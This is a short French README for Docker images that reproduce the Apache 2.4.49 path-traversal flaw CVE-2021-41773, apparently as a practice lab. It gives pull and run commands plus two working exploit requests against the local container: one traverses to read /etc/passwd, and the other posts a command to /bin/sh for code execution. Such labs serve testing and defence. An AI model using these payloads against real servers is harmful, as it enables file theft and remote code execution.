
Images Docker vulnérables pour CVE-2021-41773
Cette vulnérabilité ne s'applique qu' à la version 2.4.49 qui possède des configurations spécifiques non par défaut. Dans certaines situations, cela peut entraîner soit une lecture de fichier, soit une exécution de code.
https://twitter.com/ptswarm/status/1445376079548624899
Les conteneurs peuvent être récupérés directement depuis Docker Hub en utilisant
docker pull blueteamsteve/cve-2021-41773:no-cgid
et exécutés avec
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
Les logs Apache peuvent être consultés avec la commande ci-dessous, ou simplement exclure le "-dit" de la commande run ci-dessus pour afficher stdio
docker logs <container-id>
curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
Les conteneurs peuvent être récupérés directement depuis Docker Hub en utilisant
docker pull blueteamsteve/cve-2021-41773:with-cgid
et exécutés avec
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid
Les logs Apache peuvent être consultés avec la commande ci-dessous, ou simplement exclure le "-dit" de la commande run ci-dessus pour afficher stdio
docker logs <container-id>
curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'
Modifiez et construisez vos propres versions en utilisant le fichier dockerfile et les fichiers template httpd.conf dans les sous-répertoires